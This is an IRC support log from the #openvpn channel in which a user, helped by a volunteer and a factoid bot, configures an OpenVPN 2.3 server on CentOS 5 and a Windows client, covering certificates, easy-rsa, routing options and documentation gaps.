18:16 -!- AlbinoGeek [AcademyInt@academyintl/director/AcademyIntl] has joined #openvpn
18:16 < AlbinoGeek> !logs
18:16 <@vpnHelper> "logs" is (#1) is please pastebin your logfiles from both client and server with verb set to 5 or (#2) In the Windows client(OpenVPN-GUI) right-click the status icon and pick View Log or (#3) In the OS X client(Tunnelblick) right-click it and select Copy log text to clipboard or (#4) if you dont know how to find your logs, see !logfile
18:17 < AlbinoGeek> !logfile
18:17 <@vpnHelper> "logfile" is (#1) openvpn will log to syslog if started in daemon mode. You can manually specify a logfile with: log /path/to/logfile or (#2) verb 3 is good for everyday usage, verb 5 for debugging or (#3) see --daemon --log and --verb in the manual (!man) for more info
18:19 < AlbinoGeek> :) That fixed everything.
18:19 < AlbinoGeek> Oh how wonderful it is when channels have USEFUL topics...
18:19 -!- mattock [~mattock@openvpn/corp/admin/mattock] has quit [Quit: ZNC - http://znc.in]
18:19 -!- raidz [~raidz@openvpn/corp/admin/andrew] has quit [Quit: I shouldn't have left....]
18:20 -!- raidz [~raidz@raidz.im] has joined #openvpn
18:20 -!- raidz [~raidz@raidz.im] has quit [Changing host]
18:20 -!- raidz [~raidz@openvpn/corp/admin/andrew] has joined #openvpn
18:20 -!- mode/#openvpn [+o raidz] by ChanServ
18:20 -!- mattock [~mattock@raidz.im] has joined #openvpn
18:20 -!- mattock [~mattock@raidz.im] has quit [Changing host]
18:20 -!- mattock [~mattock@openvpn/corp/admin/mattock] has joined #openvpn
18:20 -!- mode/#openvpn [+o mattock] by ChanServ
18:20 < AlbinoGeek> Now that I've configured and successfully started OpenVPN server v2.3.x on my CentOS 5 box, and iptables forwarded (with masquerade) the private section; with ipforward enabled in sysctl.. how do I go about configuring the client?
18:21 < AlbinoGeek> I'm guessing OpenVPN requires the OpenVPN client ; (doesn't emulate PPTP/SSTP/any VPN that windows natively supports.)
18:24 < EugeneKay> It's the same `openvpn` binary whether you're in --server or --client mode
18:25 < EugeneKay> In any case, yes, you need to download the openvpn for windows app
18:25 < EugeneKay> !download
18:25 <@vpnHelper> "download" is (#1) http://openvpn.net/index.php/download/community-downloads.html to download openvpn or (#2) OpenVPN's Windows installer now includes OpenVPN GUI. Don't bother with http://openvpn.se anymore or (#3) Don't trust download.com at all.
It provides an extremely old version with malware: http://insecure.org/news/download-com-fiasco.html or (#4) in the community version of openvpn (only
18:25 <@vpnHelper> thing supported here) there is no separate download for client/server, it is the same install with different configs
18:25 < EugeneKay> This installs a special TUN/TAP device (as a network adapter) and handles the magic of routing tables, etc
18:28 < EugeneKay> You built 2.3.0 for CentOS5? You can just get a package for it, though it'll be the older 2.2 (I think... might be 2.1 still)
18:28 < EugeneKay> Most sane people have updated to 6 anyway
18:30 < AlbinoGeek> EugeneKay: Thank you. In the case of the Linux, I built everything myself and got everything working. It was nice.
18:30 < AlbinoGeek> But yeah, as per the Windows version I didn't know what to do.
18:31 < AlbinoGeek> Linux always "just works"; I don't get how people stand Windows
18:31 < EugeneKay> It works fine for me :-p
18:31 < EugeneKay> I've messed with my registry far less than I used to argue with xorg.conf
18:31 < AlbinoGeek> EugeneKay: I avoid X :)
18:31 < EugeneKay> I also have 6 monitors, and half the displays are powered by hardware that doesn't have linux drivers AT ALL, so....
18:32 < AlbinoGeek> EugeneKay: But yeah, with Windows... the builtin VPN adapter was the only one I could get working for the longest time..
18:32 < AlbinoGeek> But then suddenly PPTPD (PoPToP) stopped being updated / working on linux anymore. so I had to move to OpenVPN finally
18:32 < EugeneKay> The openvpn installer does its thing
18:32 -!- UberDuper [~UberDuper@wsip-174-77-66-158.ph.ph.cox.net] has left #openvpn []
18:32 < EugeneKay> The only caveat is that you need to start the GUI bit as Admin
18:32 < AlbinoGeek> EugeneKay: Yes, but OpenVPN GUI won't open :)
18:32 < AlbinoGeek> And I have UAC disabled before you ask.
18:33 < EugeneKay> Are you feeding it a config file?
18:33 < AlbinoGeek> EugeneKay: Well no, it's a GUI.
I just started it from the start menu; and it's done nothing; no window, no file open dialog, no configuration, no tray icon, etc.
18:34 < EugeneKay> Aha.
18:34 < EugeneKay> !ovpn
18:34 <@vpnHelper> "ovpn" is (#1) OpenVPN GUI will load config files with a .ovpn extension when double-clicked. or (#2) this is the same config file format as the standard .conf , just renamed to prevent extension collisions on Windows
18:34 < AlbinoGeek> I'm sitting in the config-file directory atm, but yeah.
18:34 < EugeneKay> Create a config file, name it foo.ovpn
18:34 < EugeneKay> Right click it and run
18:34 < AlbinoGeek> What's the default file loaded by the GUI ?
18:34 < EugeneKay> No clue.
18:34 < AlbinoGeek> ie: default.ovpn or something like that?
18:34 < AlbinoGeek> As it appears to have loaded something, TUN is up and running.
18:34 < EugeneKay> I know that if you use the Service it will load c:\
18:35 < EugeneKay> c:\Program Files (x86)\Openvpn\config\ or so
18:35 < EugeneKay> (I'm on my desktop, which doesn't have openvpn installed)
18:35 < AlbinoGeek> C:\Program Files\OpenVPN\config
18:35 < EugeneKay> Sounds right
18:35 < AlbinoGeek> Well, I'm here; but what's the default file's NAME ?
18:36 < EugeneKay> AFAIK it's just whatever is in that directory; but this is for the Service. I don't think invoking the GUI by itself does anything
18:36 < EugeneKay> There should be a tray icon you can interact with
18:36 < EugeneKay> Try running
18:36 < EugeneKay> !win_shortcut
18:36 < AlbinoGeek> Yeah, the tray icon is pretty useless. "Settings / Exit" Settings shows proxy settings, and nothing else.
18:36 < EugeneKay> !winshortcut
18:36 <@vpnHelper> "winshortcut" is To start OpenVPN-GUI easily on Windows, make a shortcut and set the Target as: \"C:\Program Files (x86)\OpenVPN\bin\openvpn-gui-1.0.3.exe\" --config_dir \"C:\path\to\config\" --connect client.ovpn --show_balloon 0 --silent_connection 1 --show_script_window 0
18:36 < EugeneKay> That isn't \"ed right, but you get the idea
18:37 < EugeneKay> I typically put my config files in c:\Users\eugene\openvpn\, rather than in the Program Files\config dir
18:37 < AlbinoGeek> Okay so let's see... time to copy server config into client config (as per tun/tap etc)
18:37 < EugeneKay> (I keep UAC enabled)
18:37 < EugeneKay> Yup, make up a standard client config file
18:37 < AlbinoGeek> Server is running... tun, alright. What else needs to be the same? Port obvs.
18:37 < AlbinoGeek> Proto set
18:38 < EugeneKay> Off the top of my head.... remote, rport, tls-client, ca, cert, key, pull
18:38 < EugeneKay> Those are the minimum settings
18:38 < EugeneKay> Oh, and proto
18:38 < AlbinoGeek> So what, download ca.crt from the server, and gen a client certificate ?
18:39 < AlbinoGeek> Because ca cert and key both say "client" in this config, but should they be the same keys as the server? (this is really odd to me, standard RSA just has you get a private key...)
18:39 < EugeneKay> Ya, you need to have a client.key and client.crt, if you're doing cert-based auth (the default and sane thing)
18:39 < AlbinoGeek> My server is a proper CA, so creating an RSA certificate for the OpenVPN server was easy, but what do I put on the client now?
18:39 < EugeneKay> No, you should have separate keys/certs for each machine in the setup
18:40 < AlbinoGeek> Uhh what?
18:40 < EugeneKay> Instead of specifying the TLS Server extension in openssl you specify TLS Client
18:40 < EugeneKay> One CA; many different certs.
18:40 < AlbinoGeek> Yeah see, now you've lost me.
In standard tunneled SSL connections (such as NX, SSH, etc) I generate a certificate on the server, then get myself a copy of the certificate on my local machine, the server keeping the private key.
18:41 < EugeneKay> Yeah, this is different
18:41 < AlbinoGeek> Then that being the authenticator :x
18:41 < EugeneKay> BOTH ends verify the identity of the other against the CA
18:41 < AlbinoGeek> Yeah, well now I have no idea; because OpenSSL-rsakeygen doesn't run on this box at all (Windows). So how would I even gen a cert here?
18:41 < EugeneKay> It's akin to how cert-based email works. You have a client cert and a server cert, both are checked.
18:41 < EugeneKay> Typically you gen on the server(or elsewhere) and then SCP it
18:42 < EugeneKay> !xca
18:42 <@vpnHelper> "xca" is (#1) XCA is a GUI to create/manage a PKI, much more user-friendly than easy-rsa. or (#2) Example XCA PKI for OpenVPN(writeup pending): https://community.openvpn.net/openvpn/wiki/XCA
18:42 < EugeneKay> That works on Windows, if you really want to do proper CSRs, but it's more pain than it's worth IMO
18:42 < AlbinoGeek> Well, easy-rsa isn't an issue; I can generate a second cert on the server if that's all I have to do.. but yeah.
18:42 < EugeneKay> Just easy-rsa on the server, SCP+delete from server
18:42 < AlbinoGeek> EugeneKay: Well, my server is a proper CA; so I do have to do the CSR / etc to get the key.
18:42 < AlbinoGeek> Does OpenVPN respect CRL by the way?
18:42 < EugeneKay> Yup, --crl option
18:43 < AlbinoGeek> Ahh good.
18:43 < EugeneKay> I believe it expects DER format, but don't quote me on that
18:43 < AlbinoGeek> Ehh, the CA spits out CRL in all formats; so it shouldn't be an issue.
18:43 < EugeneKay> I'm guessing you're talking about the red hat CA tools?
18:44 < AlbinoGeek> EugeneKay: inhouse software.
18:44 < EugeneKay> Ah, fun
18:44 < AlbinoGeek> So, in keys on the server I have...
hundreds of files, wtf did easy-rsa do :x
18:44 < EugeneKay> easy-rsa has a ./build-req command that you can use
18:45 < AlbinoGeek> This is what confuses me though, following to this point a guide on https://safesrv.net/install-openvpn-on-centos/
18:45 <@vpnHelper> Title: SafeSrv Installing OpenVPN on CentOS 5 and CentOS 6 (at safesrv.net)
18:45 < EugeneKay> Guides are useless :-p
18:45 < AlbinoGeek> They do not specify key or cert on the client, only the CA
18:45 < AlbinoGeek> Then they use linux system login
18:46 < AlbinoGeek> The only different lines in client they specify are: ca ca.crt auth-user-pass comp-lzo reneg-sec 0 verb 3
18:46 < EugeneKay> Yeah, client-cert-not-required
18:46 < AlbinoGeek> EugeneKay: client-cert-not-required isn't specified on the server.
18:46 < EugeneKay> In their guide it is
18:46 < EugeneKay> Which is a terrible idea
18:46 < AlbinoGeek> Nevermind, I saw it.
18:46 < EugeneKay> !howto
18:46 <@vpnHelper> "howto" is (#1) OpenVPN comes with a great howto, http://openvpn.net/howto PLEASE READ IT! or (#2) http://www.secure-computing.net/openvpn/howto.php for a mirror
18:47 < EugeneKay> That's the only thing we really support here, guide-wise ^
18:47 < AlbinoGeek> Welp, OpenVPN's "derp I need to authorize myself" seems pretty terrible so far...
18:47 < AlbinoGeek> http://www.secure-computing.net/openvpn/howto.php <-- I was there
18:47 <@vpnHelper> Title: SCN: OpenVPN IRC Channel Policy (at www.secure-computing.net)
18:47 < AlbinoGeek> Note how it has no steps as such as "here are some things you need to consider"
18:47 < EugeneKay> Same thing
18:47 < AlbinoGeek> Which was nice, but yeah
18:47 < EugeneKay> Yeah, that doc could use righting
18:48 < EugeneKay> writing
18:48 < AlbinoGeek> (not to mention half the commands are only there for Windows servers...
which is terrible)
18:48 < EugeneKay> Brb, need more booze, and to play with fire
18:48 < AlbinoGeek> Heh, Windows Server ^
18:51 -!- cjs226 [~cjs226@99-61-64-43.lightspeed.austtx.sbcglobal.net] has joined #openvpn
18:52 < AlbinoGeek> Right so, I need to install the CA.CRT on all client machines; and distribute to each client a pair of crt/key client files
19:01 < EugeneKay> Correct
19:09 -!- Valcorb [Valcorb@94-226-106-113.access.telenet.be] has quit [Ping timeout: 256 seconds]
19:09 -!- Valcorb [~Valcorb@94-226-106-113.access.telenet.be] has joined #openvpn
19:18 < AlbinoGeek> EugeneKay: Yeah... if I rewrite these docs here to actually be useful and less technical, who would I go about submitting it to, to be reviewed or used somewhere here?
19:19 < AlbinoGeek> Because yeah, these docs have a lot of things that just confuse people, a lot of parts you go to that don't stream into any other points, "orphaned" or "deadend" pages everywhere.
19:19 < AlbinoGeek> It's hard to follow
19:19 < EugeneKay> !wiki
19:19 <@vpnHelper> "wiki" is (#1) http://www.secure-computing.net/wiki/index.php/OpenVPN for the Unofficial wiki or (#2) https://community.openvpn.net/openvpn/wiki for the Official wiki
19:19 < EugeneKay> Write it up on the official wiki and we can add/edit the bot factoids as needed
19:19 < EugeneKay> A list of "gotchas" and things to consider would be a good start
19:20 < AlbinoGeek> Like, even the CORE things on this documentation are wrong.
19:20 < AlbinoGeek> Such as the location of the "docs" folder on your system.
19:20 < EugeneKay> That's highly build-dependent :-p
19:20 < EugeneKay> !dev
19:20 <@vpnHelper> "dev" is https://lists.sourceforge.net/lists/listinfo/openvpn-devel to sign up for devel mail list
19:21 < EugeneKay> Eh, not what I was after
19:21 < AlbinoGeek> EugeneKay: Perhaps, but " /usr/share/doc/openvpn-2.0" doesn't help any redhat person, since /usr/local/share is used for docs. Somewhere OpenVPN didn't even put its docs.
19:21 < AlbinoGeek> On my system, OpenVPN didn't even come with docs. None in the tar, none in the RPM, none even with yum.
19:21 < EugeneKay> In the packages it is in /usr/share/openvpn/
19:21 < AlbinoGeek> So.. when the guide references "default config" there are none.
19:22 < AlbinoGeek> EugeneKay: Nope
19:22 < EugeneKay> It is in.... well, lemme see which package this is
19:22 < AlbinoGeek> EugeneKay: /usr/share/openvpn/plugins/lib/ only has two files
19:22 < AlbinoGeek> And that's literally the only thing there.
19:22 < AlbinoGeek> :P
19:22 < EugeneKay> In any case, this is more of a #openvpn-devel question
19:23 < EugeneKay> If you're willing to take on these things and genuinely make it better I'm sure they'll accept your work
19:23 < EugeneKay> But it's a non-trivial thing :-p
19:23 < EugeneKay> I personally only care as far as getting people up & running
19:23 < EugeneKay> The openvpn package I use is from EPEL
19:23 < AlbinoGeek> ^ It's not that hard, writing technical documents is something I have to do quite often, and there's nothing technical about a technical document you submit to computer illiterate people (something I do quite frequently.)
19:23 < AlbinoGeek> :P
19:23 < EugeneKay> I'm on a Scientific Linux 6 system
19:23 < AlbinoGeek> Ahh
19:24 < AlbinoGeek> Scientific Linux 6 being the only sane rhel6 core
19:24 < EugeneKay> Repoforge also provides an openvpn rpm, through 2.2.2
19:24 < EugeneKay> But I only use them when I HAVE to.
19:24 < AlbinoGeek> EugeneKay: 2.3 has many nice features I needed.
19:24 < AlbinoGeek> And compiling something is trivial in linux.
19:24 < EugeneKay> I haven't bothered to rebuild the srpm with 2.3 yet
19:25 < EugeneKay> I don't need ipv6 tunneling, though I ought to
19:25 < AlbinoGeek> wget url; tar xfz file; ./configure; make; make docs; make install
19:25 < AlbinoGeek> Rebuilding the RPM actually failed for me on rhel5. No error.
19:25 < EugeneKay> I won't judge CentOS vs SL; aside from the fact that SL6 was released months before CentOS6(the reason I moved over)
19:25 < AlbinoGeek> So I just compiled it.
19:25 < EugeneKay> I prefer to stay within the package manager when possible
19:25 < EugeneKay> It helps with sanity
19:25 < AlbinoGeek> Hmm, what is one of the default doc files names ?
19:26 < EugeneKay> No clue. I always just refer to the man page
19:26 < AlbinoGeek> Found it
19:26 < EugeneKay> Really though, see -devel :-p
19:26 < EugeneKay> They know a LOT more about all this than I do
19:26 < AlbinoGeek> On CentOS5 when using compiled docs it sits in: /usr/share/doc/openvpn-2.3.0/sample-config-files/
19:26 < EugeneKay> Sounds right
19:27 -!- raidz is now known as raidz_away
19:27 < AlbinoGeek> So, without a "local" line it will bind to 0.0.0.0 yeah?
19:27 < EugeneKay> Yup
19:28 < AlbinoGeek> And should I need to push any settings for a standard setup?
19:28 < EugeneKay> Where "standard" means "minimum", correct.
19:29 < EugeneKay> The most basic of VPNs is just a p2p link
19:29 < AlbinoGeek> And what of redirect-gateway ?
19:29 < EugeneKay> Note: I ALWAYS specify "topology subnet"
19:29 < EugeneKay> !topology
19:29 <@vpnHelper> "topology" is (#1) it is possible to avoid the !/30 behavior if you use 2.1+ with the option: topology subnet This will end up being default in later versions. or (#2) Clients will receive addresses ending in .2, .3, .4, etc, instead of being divided into 2-host subnets. or (#3) See http://osdir.com/ml/network.openvpn.devel/2005-09/msg00020.html for more history on this.
19:29 < EugeneKay> !/30
19:29 <@vpnHelper> "/30" is (#1) Default behaviour assigns a /30 subnet(4 addresses) to each peer.
See http://goo.gl/6vemm for background or (#2) you can avoid this behavior by reading !topology or (#3) by default, first client is .6, then .10 .14 .18 etc or (#4) use openvpn --show-valid-subnets to see the subnets you can use in net30 or (#5) tl;dr Windows sucks, use --topology subnet in your server.conf
19:29 < EugeneKay> That's just a quick command to do the commonly-wanted "send all my internet traffic via the vpn"
19:29 < EugeneKay> !redirect
19:29 <@vpnHelper> "redirect" is (#1) to make all inet traffic flow through the vpn, you will need --redirect-gateway (see !def1), as well as IP forwarding (see !ipforward) and NAT (see !nat) enabled on the server. or (#2) you may need to use a different dns server when redirecting gateway, see !dns or !pushdns or (#3) if using ipv6 try: route-ipv6 2000::/3 or (#4) Handy troubleshooting flowchart:
19:29 <@vpnHelper> http://ircpimps.org/redirect.png
19:30 < AlbinoGeek> Well, ipforward is already configured in sysctl, what else may I have to do?
19:30 < AlbinoGeek> I have enabled push for redirect-gateway and enabled iptables masquerade.
19:31 < EugeneKay> Flowchart ;-)
19:31 < AlbinoGeek> Reading...
19:31 < AlbinoGeek> "VPN IP" being the default gateway when connected as seen by the client?
19:32 < EugeneKay> The IP address on the VPN link
19:32 < EugeneKay> eg, 10.8.0.1
19:32 < EugeneKay> If you use --topology subnet it gets a LOT easier to work with
19:32 < EugeneKay> Hence why I always use it. Always.
19:32 < AlbinoGeek> Well, I have no access to options sent to openvpn.
19:32 < EugeneKay> There are no good reasons to stick with !/30
19:32 < AlbinoGeek> (only the config file, and it doesn't take "topology" as an operand for whatever reason)
19:33 < EugeneKay> The config file?
A line containing just "topology subnet" should do it fine
19:33 -!- Orbi [~opera@anon-149-82.vpn.ipredator.se] has quit [Quit: Orbi]
19:33 < AlbinoGeek> EugeneKay: Yeah, it's erroring on that line, moment while I paste logs
19:33 < EugeneKay> !paste
19:33 <@vpnHelper> "paste" is "pastebin" is (#1) please paste anything with more than 5 lines into pastebin or a similar website, or (#2) ie: www.pastebin.ca
19:33 < AlbinoGeek> Saw that one already in the topic :) !logs
19:34 < EugeneKay> !forget paste 2
19:34 <@vpnHelper> Error: You don't have the factoids.forget capability. If you think that you should have this capability, be sure that you are identified before trying again. The 'whoami' command can tell you if you're identified.
19:34 < AlbinoGeek> !whoami
19:34 <@vpnHelper> I don't recognize you.
19:34 < AlbinoGeek> Lol
19:34 < AlbinoGeek> EugeneKay: Seems you need to auth :)
19:34 < EugeneKay> !learn paste as https://gist.github.com or http://www.pastebin.ca/ are great places to use
19:34 <@vpnHelper> Error: You don't have the factoids.learn capability. If you think that you should have this capability, be sure that you are identified before trying again. The 'whoami' command can tell you if you're identified.
19:34 < EugeneKay> What the
19:34 < EugeneKay> Gah, brb
19:34 < EugeneKay> I forget I changed my hostmask
19:35 < AlbinoGeek> EugeneKay: I wouldn't say pastebin.ca to be honest, probably gist.github.com or pastie.org
19:35 -!- EugeneKay [eugene@go-without.me] has quit [Quit: ZNC - http://znc.in]
19:35 -!- EugeneKay [eugene@itvends.com] has joined #openvpn
19:35 < AlbinoGeek> Welcome back.
19:35 < AlbinoGeek> itvends
19:35 < AlbinoGeek> ahah
19:35 < EugeneKay> !paste
19:35 <@vpnHelper> "paste" is "pastebin" is (#1) please paste anything with more than 5 lines into pastebin or a similar website, or (#2) ie: www.pastebin.ca
19:36 < EugeneKay> ;-)
19:36 < EugeneKay> Check the site
19:36 < EugeneKay> !forget paste 2
19:36 <@vpnHelper> Joo got it.
19:36 < AlbinoGeek> Eww, pastebin.ca is literally pastebinscript from pastebin.com :(
19:36 < EugeneKay> !learn paste as https://gist.github.com
19:36 <@vpnHelper> Joo got it.
19:36 < EugeneKay> !paste
19:36 <@vpnHelper> "paste" is https://gist.github.com
19:36 < EugeneKay> What the
19:36 < EugeneKay> !forget paste
19:36 <@vpnHelper> Joo got it.
19:36 < AlbinoGeek> !pastebin
19:36 <@vpnHelper> "pastebin" is please paste anything with more than 5 lines into pastebin or a similar website
19:36 < AlbinoGeek> ^
19:37 < AlbinoGeek> That's why
19:37 < EugeneKay> Oh, that got fixed finally
19:37 < AlbinoGeek> "paste is pastebin"
19:37 < EugeneKay> Ya
19:37 < AlbinoGeek> !l
19:37 < EugeneKay> Now I get to try to remember how to do this
19:37 < AlbinoGeek> Okay good, it's not that wildcardy
19:37 < AlbinoGeek> !log
19:37 <@vpnHelper> Error: You don't have the owner capability. If you think that you should have this capability, be sure that you are identified before trying again. The 'whoami' command can tell you if you're identified.
19:37 < EugeneKay> It's a very restricted bot :-p
19:37 < AlbinoGeek> -_- Too close to the name of a factoid there.
19:37 < AlbinoGeek> !logs
19:37 <@vpnHelper> "logs" is (#1) is please pastebin your logfiles from both client and server with verb set to 5 or (#2) In the Windows client(OpenVPN-GUI) right-click the status icon and pick View Log or (#3) In the OS X client(Tunnelblick) right-click it and select Copy log text to clipboard or (#4) if you dont know how to find your logs, see !logfile
19:38 < AlbinoGeek> YUS Starting openvpn: [ OK ]
19:38 < EugeneKay> !learn pastebin as https://gist.github.com is a recommended place to use
19:38 <@vpnHelper> Joo got it.
19:38 < EugeneKay> !pastebin
19:38 <@vpnHelper> "pastebin" is (#1) please paste anything with more than 5 lines into pastebin or a similar website or (#2) https://gist.github.com is a recommended place to use
19:38 < AlbinoGeek> !paste
19:38 < EugeneKay> !learn paste as @!pastebin
19:38 <@vpnHelper> Joo got it.
19:38 < EugeneKay> !paste
19:38 <@vpnHelper> "paste" is @!pastebin
19:38 < EugeneKay> Nope
19:38 < AlbinoGeek> Hahah
19:38 < EugeneKay> !forget paste
19:38 <@vpnHelper> Joo got it.
19:38 < AlbinoGeek> "pastebin"
19:39 < EugeneKay> !learn paste as pastebin
19:39 <@vpnHelper> Joo got it.
19:39 < EugeneKay> !paste
19:39 <@vpnHelper> "paste" is pastebin
19:39 < AlbinoGeek> "pastebin"
19:39 < EugeneKay> Ohhh gotcha
19:39 < EugeneKay> !forget paste
19:39 <@vpnHelper> Joo got it.
19:39 < EugeneKay> !learn paste as "pastebin"
19:39 <@vpnHelper> Joo got it.
19:39 < AlbinoGeek> !paste
19:39 < EugeneKay> !paste
19:39 <@vpnHelper> "paste" is pastebin
19:39 <@vpnHelper> "paste" is pastebin
19:39 < EugeneKay> Grrr
19:39 < AlbinoGeek> LOL angry bot is angry
19:39 < EugeneKay> !forget pastebin
19:39 <@vpnHelper> Error: 2 factoids have that key. Please specify which one to remove, or use * to designate all of them.
19:39 < EugeneKay> Gah no
19:39 < EugeneKay> !forget paste
19:39 <@vpnHelper> Joo got it.
19:39 < EugeneKay> !learn paste as [pastebin]
19:39 <@vpnHelper> Joo got it.
19:39 < EugeneKay> !paste
19:39 <@vpnHelper> "paste" is "pastebin" is (#1) please paste anything with more than 5 lines into pastebin or a similar website or (#2) https://gist.github.com is a recommended place to use
19:39 < AlbinoGeek> There we go
19:39 < EugeneKay> THERE we go.
19:40 < EugeneKay> Anyway
19:40 < AlbinoGeek> Test
19:40 < AlbinoGeek> Okay so
19:40 < EugeneKay> Back to the point, logs?
19:40 < AlbinoGeek> OpenVPN is now running
19:40 < AlbinoGeek> Client and server
19:40 < AlbinoGeek> Client is just spamming the & out of my screens
19:40 < AlbinoGeek> Finally sits at Initialization Sequence Completed
19:40 < AlbinoGeek> Okay so , flowchart time
19:40 < AlbinoGeek> 10.8.0.1 can be pinged.
19:41 < AlbinoGeek> Redirect-gateway is enabled.
19:41 < AlbinoGeek> 8.8.8.8 can be pinged.
19:41 < AlbinoGeek> Google.com can be pinged.
19:41 < EugeneKay> curl http://util.khresear.ch/myip?o=plain
19:41 < EugeneKay> (just my myip script)
19:41 < AlbinoGeek> http://secure-computing.net/ip.php shows my server's IP.
19:41 <@vpnHelper> Title: SCN: SCN (at secure-computing.net)
19:41 < EugeneKay> Everything sounds good, then
19:42 < AlbinoGeek> "it works"
19:42 < AlbinoGeek> Right, mastered Procedural Flowchart Analysis 101
19:42 < EugeneKay> So, what's the problem?
19:42 < AlbinoGeek> Now to try a real connection, voice control protocol; ICMP/IPX/TCP and UDP; bi-directional
19:42 < AlbinoGeek> brb while I try this...
19:43 < EugeneKay> Good luck
19:43 < AlbinoGeek> Literally
19:43 < ngharo> ipx, no.
19:43 < AlbinoGeek> Something tells me I'll need TAP and BRIDGED
19:43 < EugeneKay> !layer2
19:43 <@vpnHelper> "layer2" is (#1) you are using tap, what specific layer2 protocol do you need to work over the vpn? or (#2) Bridging looks like a good choice to people who don't know how to set up IP routing, but to learn routing is generally far better or (#3) protocols that use layer2 communicate by MAC address, not IP address
19:44 < EugeneKay> You nearly never need bridging
19:44 < AlbinoGeek> Oh wait a second, what the * is going on.
19:44 < AlbinoGeek> If I connect to the server's IP on anything, it uses my real connection instead of the VPN?
19:44 < EugeneKay> Yes
19:44 < AlbinoGeek> Is that just to prevent looping ?
19:44 < EugeneKay> Yup.
19:44 < AlbinoGeek> Okay so, I should be using 10.8.0.1 I guess?
19:44 < EugeneKay> Yup.
19:45 < ngharo> sure
19:46 < EugeneKay> Indeed
19:46 < AlbinoGeek> IPX is working in TUN... this doesn't make sense?
19:46 < EugeneKay> Between what?
19:46 < AlbinoGeek> Everything in your docs says "NO THIS WON'T WORK"
19:46 < AlbinoGeek> Between myself and the server, and between two clients on the same VPN.
19:46 < AlbinoGeek> (both using the server as a VPN *)
19:47 < EugeneKay> Don't confuse routed and bridged modes with tun vs tap devices
19:47 < EugeneKay> You can pass layer2 packets over a tap device running in routed mode
19:47 < AlbinoGeek> Well, it's tun and routed right now, and IPX is working.
19:48 < AlbinoGeek> Both client and server are practically using default configs, just with paths changed.
19:48 < EugeneKay> o.O
19:48 < ngharo> 0.o indeed
19:48 < AlbinoGeek> I will not complain!
19:48 < EugeneKay> I'm sure there's something going on
19:48 < EugeneKay> Maybe it's a 2.3.x thing
19:49 < EugeneKay> In any case, if it works, stop yer bitchin
19:49 < ngharo> sounds like a bug unfortunately if it does work
19:49 < AlbinoGeek> I had to enable ipv6 ipforward in sysctl to get things working, but that was common sense since it said to do it for ipv4
19:50 < AlbinoGeek> Is it possible to tunnel IPX through another protocol ?
19:50 < EugeneKay> Layer2 :-p
19:50 < AlbinoGeek> EugeneKay: Yes, but without Layer2? ie: abstractly
19:50 < AlbinoGeek> (just thinking out loud) ; kinda how "virtual ipv6" was for a while?
19:50 < AlbinoGeek> Otherwise I have 0 idea how this is working, and won't complain.
19:51 < AlbinoGeek> .
19:51 < AlbinoGeek> ^whois
19:51 < AlbinoGeek> I am AcademyInt@academyintl/director/AcademyIntl
19:52 < AlbinoGeek> Does anyone see my hostname or anything else, or does FOSS cut that out?
19:52 < EugeneKay> Shows as that here too
19:52 < EugeneKay> Freenode's cloak cuts it out
19:52 < AlbinoGeek> Ahh, okay. I won't be able to check if IRC kicked over then.
19:52 < EugeneKay> If you /whois yourself it should say "is connection from"
19:52 -!- wh1p [~wh1pl4sh@host-2-100-148-6.as13285.net] has joined #openvpn
19:52 -!- wh1p [~wh1pl4sh@host-2-100-148-6.as13285.net] has quit [Client Quit]
19:53 < EugeneKay> connecting*
19:53 < AlbinoGeek> AlbinoGeek's info: is connecting from *@you.would.like.to.know 127.0.0.1
19:53 < EugeneKay> I can't spell tonight. Need more booze
19:53 < AlbinoGeek> I'm pretty sure my client removes that :x
19:53 < AlbinoGeek> This client is more skiddy than a real IRC client, so I'm not surprised it filters / randomly changes things.
19:54 < EugeneKay> Aha
19:54 < EugeneKay> HexChat shows it fine
19:54 < AlbinoGeek> EugeneKay: Ahh, so you know what a Skid is? :P
19:54 < EugeneKay> Nope
19:54 < AlbinoGeek> So, I can't use the same client keypair on another machine, can I?
19:54 < AlbinoGeek> What will happen if I do?
19:55 < EugeneKay> You can. If you connect, the default is to knock off any previously-connected clients(identified by IP+source port) using the same common-name
19:55 < EugeneKay> Look at --duplicate-cn
19:55 < AlbinoGeek> Well, username-as-cn is on, so that'd be a bad idea to try I guess.
19:56 < EugeneKay> Yeah
19:57 < AlbinoGeek> EugeneKay: Uhoh, it won't let me make more client keys.
19:57 < EugeneKay> o.O ?
19:57 < AlbinoGeek> That big "reset everything" error
19:57 < AlbinoGeek> EugeneKay: http://pastie.org/5722988
19:58 < EugeneKay> Oh
19:58 < EugeneKay> Just run 'source ./vars'
19:58 < AlbinoGeek> (because I've already built my dh ?)
19:58 < EugeneKay> All it's saying is that your current bash session doesn't have the right set of env vars defined
19:58 < AlbinoGeek> ./vars: No such file or directory
19:58 < AlbinoGeek> there's a "vars" file in the cd
19:58 < EugeneKay> Did you copy easy-rsa someplace?
:-p
19:58 < EugeneKay> You should have a vars file
19:59 < AlbinoGeek> There is a vars file, I can see it in ls-lisa
19:59 < EugeneKay> That's the one you wanna source
19:59 < EugeneKay> It's just some basic stuff about your CA
19:59 < AlbinoGeek> NOTE: If you run ./clean-all, I will be doing a rm -rf on /etc/openvpn/easy-rsa/2.0/keys
19:59 < AlbinoGeek> Just a warning I guess?
19:59 < EugeneKay> So don't do that
19:59 < EugeneKay> Ya. The HOWTO says to do clean-all
19:59 < EugeneKay> If you're just adding a new keypair, DONT do that
19:59 < AlbinoGeek> Yeah, obvs :)
19:59 < EugeneKay> (another place the docs could use work)
20:00 < AlbinoGeek> I know what rm -rf does, unlike some Ubuntu people....
20:00 < EugeneKay> Hehehe
20:00 < AlbinoGeek> Committing.. and downloading. Nice.
20:00 < AlbinoGeek> Hopefully this works, if so then I'll be out of your hair.
20:01 < EugeneKay> You seem to know what you're talking about. A welcome respite
20:01 < EugeneKay> Feel free to stick around ;-)
20:01 < AlbinoGeek> How lively is this channel exactly, OpenVPN seems to have scared off many of its prospective users by being so cryptic in its setup instructions.
20:02 < AlbinoGeek> Myself included for a while.
20:02 < EugeneKay> We get a few people a day
20:02 < EugeneKay> Networking is not for the light-of-heart
20:02 < EugeneKay> !101
20:02 <@vpnHelper> "101" is This channel is not a '101' replacement for any of the following topics or others: Networking, Firewalls, Routing, Your OS, Security, etc etc
20:02 < EugeneKay> We're not scared to point to that ^
20:03 < AlbinoGeek> Perhaps, but at least some documentation should be there :). I suppose I'll have to submit these changes.
20:04 < AlbinoGeek> I've chosen to head the docs I write in a sense of "howto" from your operating system and distro point of view, with all pathnames and commands on that page listed only for your selected distro and OS to prevent confusion.
